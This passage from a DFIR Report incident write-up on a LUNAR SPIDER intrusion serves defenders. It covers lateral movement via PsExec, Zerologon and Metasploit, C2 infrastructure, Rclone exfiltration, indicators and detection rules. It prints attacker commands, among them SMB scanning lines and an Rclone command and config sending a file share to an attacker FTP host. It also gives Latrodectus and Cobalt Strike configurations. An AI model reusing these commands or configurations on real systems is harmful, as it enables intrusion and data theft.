actor deployed the rustscan tool through the Cobalt Strike-injected spoolsv.exe\r\nprocess, first running rustscan with the help flag. The threat actor then began scanning various /16 and /8 network\r\nblocks for SMB services.\r\nrustscan.exe -a REDACTED/16 -p 445 --no-nmap\r\nrustscan.exe -a REDACTED/16 -p 445\r\nrustscan.exe -a REDACTED/8 -p 445\r\n\"nmap -vvv -p 445 REDACTED\"\r\nLateral Movement\r\nWMI Remoting\r\nAlthough the threat actor ran discovery commands just under an hour from the initial access, the first lateral\r\nmovement attempt came three days into the intrusion when the threat actor attempted to execute the system.dl_\r\nCobalt Strike beacon on a domain controller via WMIC remote execution. This execution was not successful as it\r\nwas not observed on the domain controller.\r\nRemote Services\r\nAfter the failed lateral movement attempt via WMIC, the threat actor pivoted to PsExec. The initial PsExec command\r\nalso failed since the threat actor forgot to include the accepteula flag.\r\nAfter fixing the forgotten EULA mistake, they were able to successfully execute system.dl_ on the domain controller\r\nvia rundll32.\r\nThe threat actor then proceeded to execute the same command on a file share server and backup server minutes after\r\nthe domain controller execution.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 27 of 48\n\nSix hours after this initial lateral movement activity, the threat actor deployed and executed the zero.exe payload\r\nfrom C:\\ProgramData on the beachhead. This payload, delivered via BackConnect session, was a custom\r\nimplementation of the Zerologon vulnerability (CVE-2020-1472) exploit with capabilities for credential harvesting\r\nand remote code execution.\r\nzero.exe delivered via BackConnect\r\nDuring the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable\r\nwas executed on the beachhead host and targeted a second domain controller, overall it was executed eight different\r\ntimes with a different username being used every execution. The execution used remote services to run code on\r\nlateral hosts.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 28 of 48\n\nAfter the completion of the zero.exe executions, the threat actor attempted to establish a Metasploit reverse shell\r\nconnection via a remote service on the same domain controller, to the C2 server at 217.196.98[.]61:4444.\r\nRemote Service executing Metasploit shellcode\r\nRunning Metasploit shellcode in speakeasy\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 29 of 48\n\nRDP\r\nRDP was another Windows native tool used by the threat actor for lateral movment. The threat actor had extracted\r\ndomain admin credentials as discussed in the Credential Access section, these credentials were used by the threat\r\nactor to login to two servers in the environment from the beachhead device via RDP, giving them interactive admin\r\naccess to both devices.\r\nWhile the logins originated from the beachhead host the threat actor leaked their source hostname during the\r\nauthentication process.\r\nVPS2DAY-32220LE\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 30 of 48\n\nThe threat actor’s hostname implies that the infrastructure used by them was provided via a German hosting company\r\nVPS2DAY, which seems to be operating under the name Servinga since the vps2day domain redirects to Servinga.\r\nCommand and Control\r\nLatrodectus/Backconnect\r\nThe malware used to gain the initial foothold in the host was a Latrodectus Javascript file. The aforementioned file\r\nhas been associated with high confidence to the Russian threat actor LUNAR SPIDER by Eclecticiq.\r\nIt is important to note that although the sample contained only two domains, the injected explorer.exe communicated\r\nwith three additional C2 servers. After further investigating the explorer’s memory, the following HTTPS request was\r\nidentified towards one of the new domains:\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 31 of 48\n\nUpon decrypting the encrypted traffic sent by Latrodectus to the C2, the following information was identified:\r\nC2 Domain hxxps[://]grasmertal[.]com/live/\r\nCampaign\r\nID\r\n2221766521\r\nLatrodectus\r\nVersion\r\n1.3\r\nRC4 Key xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8\r\nOne extra functionality observed from the Latrodectus malware was Command and Control communication using the\r\nBackconnect protocol. More specifically, connections from explorer.exe and dllhost.exe were performed toward two\r\ndifferent IP addresses. Additionally, these IP’s have been categorized with moderate confidence related to IcedId\r\nBackconnect, which commonly shares infrastructure with Latrodectus.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 32 of 48\n\nConnections to the first IP started during the first day and then swapped to the second IP on the fifth day.\r\nAs it was previously mentioned, utilizing Backconnect, various tasks were performed, such as browsing the file\r\nsystem, reading files, and uploading malware on the infected hosts.\r\nBackconnect traffic showing file upload\r\nDescription Domain IP Address Port ORG Country\r\nLatrodectus\r\nC2\r\nworkspacin[.]cloud\r\n104.21.16.155\r\nor\r\n172.67.213.171\r\n443 CLOUDFLARENET US\r\nLatrodectus\r\nC2\r\nilloskanawer[.]com 173.255.204.62 443\r\nAkamai Connected\r\nCloud\r\nUS\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 33 of 48\n\nLatrodectus\r\nC2\r\ngrasmetral[.]com\r\n104.21.52.10 or\r\n172.67.193.233\r\n443 CLOUDFLARENET  US\r\nLatrodectus\r\nC2\r\njarkaairbo[.]com\r\n172.67.172.177\r\nor 104.21.30.90\r\n443 CLOUDFLARENET  US\r\nLatrodectus\r\nC2\r\nscupolasta[.]store\r\n172.67.174.176\r\nor 104.21.88.89\r\n443 CLOUDFLARENET  US\r\nLatrodectus\r\nMSI Second\r\nStage\r\n– 91.194.11.64 443\r\nTANGRAM-CANADA-INC\r\nCA\r\nBackconnect – 193.168.143.196 443 Zergrush Srl RO\r\nBackconnect – 185.93.221.12 443 SHOCK-1 RO\r\nBrute Ratel\r\nThe MSI file downloaded by the malicious Javascript contained a Brute Ratel DLL (upfilles.dll) that started C2\r\ncommunication to a series of remote hosts. Of note is the use of the Tyk.io service which we have covered in prior\r\nreports.\r\nDomain IP Address Port ORG Country\r\nanikvan[.]com 95.164.68.73 443\r\nPq Hosting\r\nPlus S.r.l.\r\nDE\r\naltynbe[.]com 138.124.183.215 443\r\nPq Hosting\r\nPlus S.r.l.\r\nUS\r\nboriz400[.]com 91.194.11.183 443\r\nTANGRAM-CANADA-INC\r\nCA\r\nridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io54.165.22.33 or 35.153.92.249\r\nor 34.233.204.207 or\r\n54.159.36.188 or 35.172.8.165\r\nor 54.175.181.104\r\n443\r\nAMAZON-AES\r\nUS\r\nuncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io\r\n3.72.42.242 or 3.69.236.35 or\r\n35.157.36.116 or 3.66.241.8 or\r\n3.124.114.34 or 3.69.194.165\r\n443 AMAZON-02 DE\r\nOn the fifth day, the threat actor deployed a second Brute Ratel badger, named wscadminui.dll, which communicated\r\nwith the following domains:\r\nDomain IP Address Port ORG Country\r\nerbolsan[.]com 94.232.249.100 443 Psb Hosting Ltd  NL\r\nerbolsan[.]com 94.131.108.254 443 Pq Hosting Plus S.r.l. TR\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 34 of 48\n\nsamderat200[.]com 94.232.249.108 443 Psb Hosting Ltd  NL\r\nsamderat200[.]com 45.150.65.85 443 Pq Hosting Plus S.r.l. US\r\ndauled[.]com 195.123.225.161 443 Green Floid LLC BG\r\nkasymdev[.]com 195.211.98.249 443 Green Floid LLC US\r\nkasym500[.]com 195.123.225.251 443 Green Floid LLC BG\r\nLsassa\r\nLsassa.exe was a .NET malware that was deployed on the fourth day. It attempted to communicate with its C2 server\r\nevery 250 seconds. Additionally, each POST request contained the hostname of the infected workstation and the\r\nusername of the compromised user, which were sent to the server.\r\nDomain IP Address Port Protocol ORG Country\r\ncloudmeri[.]com 162.0.209.121 443 HTTPS  NAMECHEAP-NET US\r\nMetasploit\r\nThe psexec Metasploit module was utilized by the threat actor in order to perform lateral movement. During the\r\nanalysis of the Metasploit shellcode, it was identified that it utilized the IP 217.196.98.61 to perform C2\r\ncommunication.\r\nIP Address Port Protocol ORG Country\r\n217.196.98.61 4444 TCP Aeza International LTD DE\r\nAlthough the Metasploit shellcode was executed, it was unable to establish a successful Command and Control\r\nconnection, and the server rejected the connection.\r\nCobalt Strike\r\nThe final Command and Control tool used was Cobalt Strike. In the C2 communication, both HTTPS and HTTP\r\ntraffic were detected:\r\nBeacon Domain IP Address Port Protocol ORG Country\r\nsys.dll avtechupdate[.]com 206.206.123.209 443 HTTPS\r\nDatacamp\r\nLimited\r\nUS\r\ncron801.dl_,system.dl_ – 45.129.199.214\r\n80\r\nor\r\n8080\r\nHTTP\r\nBlueVPS\r\nOU\r\nEE\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 35 of 48\n\n– – 31.13.248.153\r\n80\r\nor\r\n8080\r\nHTTP ASNET BG\r\nTo summarize the Command and Control activity and showcase its intensity over time, the following graphs were\r\nmade:\r\nBeaconing with Cobalt Strike\r\nBeaconing without Cobalt Strike\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 36 of 48\n\nExfiltration\r\nRclone\r\nFrom a Cobalt Strike beacon on a file share server, the threat actor dropped a data exfiltration toolkit in the\r\nProgramData directory. This included a VBScript launcher (start.vbs), batch automation script (run.bat), renamed\r\nRclone (sihosts.exe), and Rclone configuration file (rclone.conf). This toolkit automated the theft of sensitive data by\r\nsyncing it to threat actor-controlled cloud storage using the legitimate Rclone utility.\r\nContent of start.vbs\r\nContent of run.bat:\r\nC:\\programdata\\sihosts.exe copy \"E:\" ftp:REDACTED\\\u003cFile Share Server\u003e\\E -q --exclude \"*.{ai,bin,blf,bmp\r\nThe threat actor dropped the Rclone configuration file (rclone.conf) twice on the file share server in quick succession.\r\nThe first rclone.conf file creation occurred three minutes before the second one, with two executions occurring\r\nbetween them, hinting that there may have been a mistake in the first config file dropped by the threat actor. The first\r\nexecution had a syntax error with specifying the drive to exfiltrate files from (threat actor added an extra colon to the\r\ndrive), and the second execution showed that the threat actor had initially dropped the config file with an incorrect\r\nusername added to it.\r\nThe FTP traffic shows that the username used was J0eBidenAbrabdy1aS3ha2 when it should have been\r\nJ0eBidenAbrabdy1aS3ha2Yeami which was the username found in the rclone.conf file found on the infected device\r\n(the same password was used in both executions).\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 37 of 48\n\n[ftp]\r\ntype = ftp\r\nhost = 45.135.232.3\r\nuser = J0eBidenAbrabdy1aS3ha2Yeami\r\n#port = 21\r\npass = \u003cREDACTED PASSWORD\u003e\r\n#tls = false\r\nExfiltration activity took place over 9 hours and 46 minutes.\r\nImpact\r\nAs discussed in the Exfiltration section, on the twentieth day, the threat actor successfully performed data exfiltration.\r\nDespite that, no further final actions on objectives were performed until they were evicted from the network.\r\nTimeline\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 38 of 48\n\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 39 of 48\n\nDiamond Model\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 40 of 48\n\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 41 of 48\n\nIndicators\r\nAtomic\r\nRDP Client Name\r\nVPS2DAY-32220LE\r\nRclone configuration\r\nhost: 45.135.232.3\r\nuser: J0eBidenAbrabdy1aS3ha2Yeami\r\nuser: J0eBidenAbrabdy1aS3ha2\r\nLatrodectus Domains\r\nworkspacin[.]cloud\r\nilloskanawer[.]com\r\ngrasmetral[.]com\r\njarkaairbo[.]com\r\nscupolasta[.]store\r\nBackconnect IP Addresses\r\n185.93.221.12\r\n193.168.143.196\r\nLsassa Backdoor Domain\r\ncloudmeri[.]com\r\nLsassa Backdoor IP Addresses\r\n162.0.209.121\r\nBrute Ratel Domains\r\nanikvan[.]com\r\naltynbe[.]com\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 42 of 48\n\nboriz400[.]com\r\nridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io\r\nuncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io\r\nerbolsan[.]com\r\nsamderat200[.]com\r\ndauled[.]com\r\nkasymdev[.]com\r\nkasym500[.]com\r\nBrute Ratel IP Addresses\r\n95.164.68.73\r\n138.124.183.215\r\n91.194.11.183\r\n94.232.249.100\r\n94.131.108.254\r\n94.232.249.108\r\n45.150.65.85\r\n195.123.225.161\r\n195.211.98.249\r\n195.123.225.251\r\nMetasploit IP Addresses\r\n217.196.98.61\r\nCobalt Strike Domains\r\navtechupdate[.]com\r\nCobalt Strike IP Addresses\r\n206.206.123.209\r\n45.129.199.214\r\n31.13.248.153\r\nLatrodectus Configuration\r\nConfig:\r\n{\r\n \"Version\": \"1.3\",\r\n \"Direction\": \"4\",\r\n \"C2s\": [\r\n \"hxxps://workspacin[.]cloud/live/\",\r\n \"hxxps://illoskanawer[.]com/live/\"\r\n ],\r\n \"RC4\": \"xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8\",\r\n \"GroupID\": \"2221766521\",\r\n \"CampaignID\": \"Electrol\"\r\n}\r\n \r\nDecrypted Strings:\r\n{\r\n\"pid\":\r\n\"%d\",\r\n\"proc\":\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 43 of 48\n\n\"%s\",\r\n\"subproc\": [\r\n]\r\n}\r\n\u0026desklinks=[\r\n*.*\r\n\"%s\"\r\n]\r\n\u0026proclist=[\r\n{\r\n\"pid\":\r\n\"%d\",\r\n\"proc\":\r\n\"%s\",\r\n\"subproc\": [\r\n]\r\n}\r\n/c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c systeminfo\r\nC:\\Windows\\System32\\cmd.exe\r\n/c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n/c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nC:\\Windows\\System32\\wbem\\wmic.exe\r\n/c net config workstation\r\nC:\\Windows\\System32\\cmd.exe\r\n/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | f\r\nC:\\Windows\\System32\\cmd.exe\r\n/c whoami /groups\r\nC:\\Windows\\System32\\cmd.exe\r\n\u0026ipconfig=\r\n\u0026systeminfo=\r\n\u0026domain_trusts=\r\n\u0026domain_trusts_all=\r\n\u0026net_view_all_domain=\r\n\u0026net_view_all=\r\n\u0026net_group=\r\n\u0026wmic=\r\n\u0026net_config_ws=\r\n\u0026net_wmic_av=\r\n\u0026whoami_group=\r\nrunnung\r\nfront\r\n/files/\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 44 of 48\n\n%d\r\n%s%s\r\nfiles/bp.dat\r\n%s\\%d.dll\r\n%d.dat\r\n%s\\%s\r\ninit -zzzz=\"%s\\%s\"\r\nElectrol\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nPOST\r\nGET\r\nCLEARURL\r\nURLS\r\nCOMMAND\r\nERROR\r\nxkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\nhttps://workspacin.cloud/live/\r\nhttps://illoskanawer.com/live/\r\n%s%d.dll\r\n%s%d.exe\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\n\u003chtml\u003e\r\n\u003c!DOCTYPE\r\n\u0026mac=\r\n%02x\r\n:%02x\r\n;\r\n\u0026computername=%s\r\n\u0026domain=%s\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s,%s\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s\r\n12345\r\n\u0026stiller=\r\nCobalt Strike Beacon Configuration (system.dl_ | cron801.dl_)\r\nVersion: 4.6\r\nSocket: 80\r\nBeacon Type: HTTP\r\nMaxGetSize: 2105681\r\nURL: hxxp://45.129.199[.]214/vodeo/wg01ck01\r\nJitter: 49\r\nEncryption Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGcLYJG9miEP3Lp+FqQ74n9HNbqI/s4ZE5fg0PHR7voXFnSWg\r\nHttpPostUri: /vodeo/vid_wg01ck01\r\nUser Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 45 of 48\n\nMalleableC2Instructions: Remove 4338 chars from the end, Remove 4183 chars from the begςinning, NetBIOS\r\nHTTPGetClient: mask, header Accept: application/xml, text/html, application/xhtml+xml\r\nHTTPPostClient: mask, mask, header Accept: text/html, application/xhtml+xml, application/json\r\nHTTPGet_Verb: GET\r\nHTTPPost_Verb: POST\r\nspawnto_x64: %windir%\\sysnative\\gpupdate.exe\r\nspawnto_x86: %windir%\\syswow64\\gpupdate.exe\r\nProxy_Behavior: Use IE settings\r\nWatermark: 987654321\r\nJitter: 49\r\nProcessInject_MinAllocation: 19836\r\nProcessInject_AllocationMethod: NtMapViewOfSection\r\nComputed\r\nrustscan.exe\r\n9eaa8464110883a15115b68ffa1ecf7d\r\n5348970723b378c7cae35bb03d8736f8e5a9f0ac\r\n37471af00673af4080ee21bd248536147e450d2eff45e8701a95d1163a9d62fe\r\nlsassa.exe\r\n50abc42faa70062e20cd5e2a2e2b6633\r\n97d72c8bbcf367be6bd5e80021e3bd3232ac309a\r\n203eda879dbdb128259cd658b22c9c21c66cbcfa1e2f39879c73b4dafb84c592\r\nrun.bat\r\nc8ea31665553cbca19b22863eea6ca2c\r\nba99cd73b74c64d6b1257b7db99814d1dc7d76b1\r\n411dfb067a984a244ff0c41887d4a09fbbcd8d562550f5d32d58a6a6256bd7b2\r\nstart.vbs\r\n4b3e9c9e018659d1cf04daf82abe3b64\r\n333e1c5967a9a6c881c9573a3222bed6ada911c6\r\n1a8ebf914ebea34402eecbf0985f05ae413663708d2fcc842fc27057ac5ec4ed\r\nsys.dll\r\nad3c52316e0059c66bc1dd680cf9edad\r\n8dfa63c0bb611e18c8331ed5b89decf433ac394a\r\n100e03eb4e9dcdab6e06b2b26f800d47a21d338885f5dc1b42c56a32429c9168\r\nCobalt Strike\r\nsystem.dl_ or cron801.dl_\r\n495363b0262b62dfc38d7bfb7b5541aa\r\n2d92890374904b49d3c54314d02b952e1a714e99\r\n77eede38abdc740f000596e374b6842902653aeafb6c63011388ebb22ec13e28\r\nBruteRatel\r\nupfilles.dll\r\nccb6d3cb020f56758622911ddd2f1fcb\r\n4a013f752c2bf84ca37e418175e0d9b6f61f636d\r\nf4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 46 of 48\n\nBruteRatel\r\nwscadminui.dll\r\nd7bd590b6c660716277383aa23cb0aa9\r\n38999890b3a2c743e0abea1122649082a5fa1281\r\n6c3b2490e99cd8397fb79d84a5638c1a0c4edb516a4b0047aa70b5811483db8f\r\nzero.exe\r\n91889658f1c8e1462f06f019b842f109\r\n33a6b39fbe8ec45afab14af88fd6fa8e96885bf1\r\n36bc32becf287402bf0e9c918de22d886a74c501a33aa08dcb9be2f222fa6e24\r\nc356468.exe\r\nA2B6479A69B51AE555F695B243E4FDA1\r\n23FFF588E3E5CC6678E1F77FAB9318D60F3AC55F\r\n8FB5034AEDF41F8C8C4C4022FDDE7DB3C70A5A7C7B5B4DEC7F6A57715C18A5BF\r\nDetections\r\nNetwork\r\nET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND\r\nET MALWARE Windows Microsoft Windows DOS prompt command Error not recognized\r\nET POLICY Observed MSI Download\r\nThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 60%)\r\nThreatFox Unidentified 111 (Latrodectus) botnet C2 traffic (ip:port - confidence level: 75%)\r\nThreatFox botnet C2 traffic (domain - confidence level: 100%)\r\nET HUNTING ZIP file exfiltration over raw TCP\r\nET DROP Spamhaus DROP Listed Traffic Inbound group 5\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Private Rules:\r\n67eb826d-7745-416c-9674-525ef0dc7610 : Launching VNC Interactive Session\r\ne652d235-b994-432e-b2f3-15a9cee381df : Domain Enumeration Using Netdom Query\r\nf8a8998f-dfe9-4942-812c-f4e591653ced : MS-Settings Shell Command Hijacking\r\n1f959fda-4c54-4dad-9bca-4a5a65529772 : MSI Payload Executing Suspicious DLL Through Rundll32\r\na566b9e8-0a5c-4128-b499-c7632915d5e2 : Suspicious Type Command Over Administrative Share\r\nc42e8603-0311-4e4e-8923-4c1e8be9d78d : Suspicious Computer Machine Password Reset\r\n1b8ad6a1-35c3-4400-9678-e7d3e3b0acfd : DNS data export using dnscmd.exe\r\nb326e9ad-0d9b-43bf-8bd0-9620839c6f6b : Veeam Backup Credential Theft Detection\r\nSigma Repo:\r\nd522eca2-2973-4391-a3e0-ef0374321dae : Abused Debug Privilege by Arbitrary Parent Processes\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe\r\n85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 : CobaltStrike Named Pipe Patterns\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 47 of 48\n\n7b434893-c57d-4f41-908d-6a17bf1ae98f : Network Connection Initiated From Process Located In Potentially\r\n08249dc0-a28d-4555-8ba5-9255a198e08c : Outbound Network Connection Initiated By Script Interpreter\r\ned74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools\r\n85b0b087-eddf-4a2b-b033-d771fa2b9775 : PowerShell Download and Execution Cradles\r\n3dfd06d2-eaf4-4532-9555-68aca59f57c4 : Process Execution From A Potentially Suspicious Folder\r\n8834e2f7-6b4b-4f09-8906-d2276470ee23 : PsExec/PAExec Escalation to LOCAL SYSTEM\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\ndf55196f-f105-44d3-a675-e9dfb6cc2f2b : Renamed AdFind Execution\r\n5bb68627-3198-40ca-b458-49f973db8752 : Rundll32 Execution Without Parameters\r\n152f3630-77c1-4284-bcc0-4cc68ab2f6e7 : Shell Open Registry Keys Manipulation\r\n3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : Suspicious PowerShell Download and Execute Pattern\r\n3c89a1e8-0fba-449e-8f1b-8409d6267ec8 : Suspicious Process Created Via Wmic.EXE\r\n5cc2cda8-f261-4d88-a2de-e9e193c86716 : Suspicious Processes Spawned by WinRM\r\ndcdbc940-0bff-46b2-95f3-2d73f848e33b : Suspicious Spool Service Child Process\r\n2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation\r\n1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Fol\r\nYara\r\nNew Rules:\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/28761/28761.yar\r\nSource: https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 48 of 48\n\nHashing algorithm Then it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key:\n21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00\n Page 6 of 48", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/" ], "report_names": [ "from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion" ], "threat_actors": [ { "id": "c2385aea-d30b-4dbc-844d-fef465cf3ea9", "created_at": "2023-01-06T13:46:38.916521Z", "updated_at": "2026-04-10T02:00:03.144667Z", "deleted_at": null, "main_name": "LUNAR SPIDER", "aliases": [ "GOLD SWATHMORE" ], "source_name": "MISPGALAXY:LUNAR SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a6814184-2133-4520-b7b3-63e6b7be2f64", "created_at": "2025-08-07T02:03:25.019385Z", "updated_at": "2026-04-10T02:00:03.859468Z", "deleted_at": null, "main_name": "GOLD VICTOR", "aliases": [ "DEV-0832 ", "STAC5279 ", "Vanilla Tempest ", "Vice Society", "Vice Spider " ], "source_name": "Secureworks:GOLD VICTOR", "tools": [ "Advanced IP Scanner", "Advanced Port Scanner", "HelloKitty ransomware", "INC ransomware", "MEGAsync", "Neshta", "PAExec", "PolyVice ransomware", "PortStarter", "PsExec", "QuantumLocker ransomware", "Rhysida ransomware", "Supper", "SystemBC", "Zeppelin ransomware" ], "source_id": "Secureworks", "reports": null }, { "id": "7cfe3bc9-7a6c-4ee1-a635-5ea7b947147f", "created_at": "2024-06-19T02:03:08.122318Z", "updated_at": "2026-04-10T02:00:03.652418Z", "deleted_at": null, "main_name": "GOLD SWATHMORE", "aliases": [ "Lunar Spider " ], "source_name": "Secureworks:GOLD SWATHMORE", "tools": [ "Cobalt Strike", "GlobeImposter", "Gozi", "Gozi Trojan", "IcedID", "Latrodectus", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "475ea823-9e47-4098-b235-0900bc1a5362", "created_at": "2022-10-25T16:07:24.506596Z", "updated_at": "2026-04-10T02:00:05.015497Z", "deleted_at": null, "main_name": "Lunar Spider", "aliases": [ "Gold SwathMore" ], "source_name": "ETDA:Lunar Spider", "tools": [ "BokBot", "IceID", "IcedID", "NeverQuest", "Vawtrak", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "84aa9dbe-e992-4dce-9d80-af3b2de058c0", "created_at": "2024-02-02T02:00:04.041676Z", "updated_at": "2026-04-10T02:00:03.537352Z", "deleted_at": null, "main_name": "Vanilla Tempest", "aliases": [ "DEV-0832", "Vice Society" ], "source_name": "MISPGALAXY:Vanilla Tempest", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", 